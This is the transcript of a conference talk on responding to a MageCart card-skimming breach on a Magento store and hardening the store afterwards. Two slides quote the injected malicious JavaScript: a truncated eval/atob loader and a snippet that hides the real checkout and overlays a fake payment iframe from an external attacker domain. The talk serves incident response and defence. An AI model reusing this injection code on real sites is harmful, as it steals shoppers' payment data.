Locking down your Magento store

Locking down your Magento store

With the increase in the prevalence of MageCart and other JavaScript based attacks, I share our experience responding to a breach and the process to go through. I also discuss the challenge of balancing security team requirements with that of the Ecommerce team and finding a balance.

167e3044ed845338afdf5cc3446f5b17?s=128

Tom Robertshaw

May 01, 2019
Tweet

Transcript

  1. Locking down your Magento Shop Tom Robertshaw @bobbyshaw

  2. And 10,000s more. MageCart

  3. • 20 lines of JS • Duplicates form submissions to

    dead-drop. • Invisible to merchant and customer. MageCart
  4. Dude, where’s my checkout?

  5. “The checkout’s broken” “Wait a minute, that’s not our checkout.”

    Identify
  6. eval(atob("ZnVuY3Rpb24gc2V0QzAxKG5hbWUsdmFsdWUsZGF5...”)); Identify

  7. if (document.title == "One Step Checkout | Merchant Name") {

    var __gt2 = "https://api-secure-checkout.com" ; var __b0 = document.body; __b0.insertAdjacentHTML('beforebegin', '<iframe src=' + __gt2 + '/checkout_merchantname.php?id=" id="XBA323" width="100%" height="1000px" frameBorder="0"></iframe>'); __b0.style.display = "none"; } Identify
  8. • Admin User ◦ Name, Email, Changed and Updated At

    • Misc Scripts Config ◦ The breach Preserve
  9. • Delete Admin User • Remove script from Misc Scripts

    Config • Review and Redeploy all files Remove Hack
  10. ‍♀ • When? • What? • How? Investigate

  11. • Admin actions log • Web server access log 216.151.184.62

    - - [29/Jan/2019:11:30:46 +0000] "GET /downloader/ HTTP/1.1" 200 18034 216.151.184.62 - - [04/Feb/2019:14:48:16 +0000] "GET /index.php/admin/permissions_user/new/key/95bcf8a73ce1ff3535e4ba6d2167760f/ HTTP/1.1" 200 17907 216.151.184.62 - - [04/Feb/2019:15:23:10 +0000] "POST /index.php/admin/system_config/save/section/design/95bcf8a73ce1ff3535e4ba6d2167760f/ HTTP/1.1" 200 Investigate
  12. • Code Vulnerability ◦ Core, third-party plugins, bespoke plugins •

    Admin access ◦ Brute force, Infected staff computers • External software ◦ Phpmyadmin (adminer), magmi Investigate
  13. • Rotate passwords • Remove Downloader • Implement next level

    of security ◦ E.g. IP restricted admin Close Up Breach
  14. ✉ Report nefarious domain and IP to registrar and host.

    Close Up Breach
  15. • Customers • ICO • Payment providers • Insurers Report

  16. Monitor for new breaches. Monitor

  17. Security Monitoring https://sansec.io/

  18. 1. Identify 2. Preserve 3. Remove Hack 4. Investigate 5.

    Close up breach 6. Report 7. Monitor Breach Response Summary
  19. “I use an iframe payment gateway, I’m safe” No one

    is safe
  20. What should you do? How much should you spend?

  21. • Fines from Visa & Mastercard • Increased transaction costs

    • Increased business insurance costs • Fines from ICO • Loss of business as customers lose trust • Time & money spent investigating and resolving hack Business Impact
  22. Marketing Team vs Security Team Flexibility vs control The Dichotomy

  23. • Password management tool • Two-factor auth or IP whitelisting

    Admin Security
  24. Web application firewall, e.g. Cloudflare Firewalls

  25. • Keep core & modules up to date • Security

    audit each module Code
  26. • Sign your JS where possible. <script integrity="sha256-ZGMHgi9G7WU+Z7WiP2suSn84yzoN83sGf9nMWJhVHAw=" src="//cdn.shopify.com/s/assets/storefront/express_buttons-646307822f 46ed653e67b5a23f6b2e4a7f38cb3a0df37b067fd9cc5898551c0c.js

    "></script> Subresource Integrity
  27. Block/Monitor loaded assets Content-Security-Policy-Report-Only: default-src 'self'; report-uri https://test-report.trackcsp.com/v1/494b06af-eb50-4c85-90 97-aa7c31e591b9 Content

    Security Policies
  28. @gwillem Listen to Industry Experts @_talesh

  29. Talesh Seeparsan’s Incident Response Template https://github.com/ talesh/response

  30. Thanks @bobbyshaw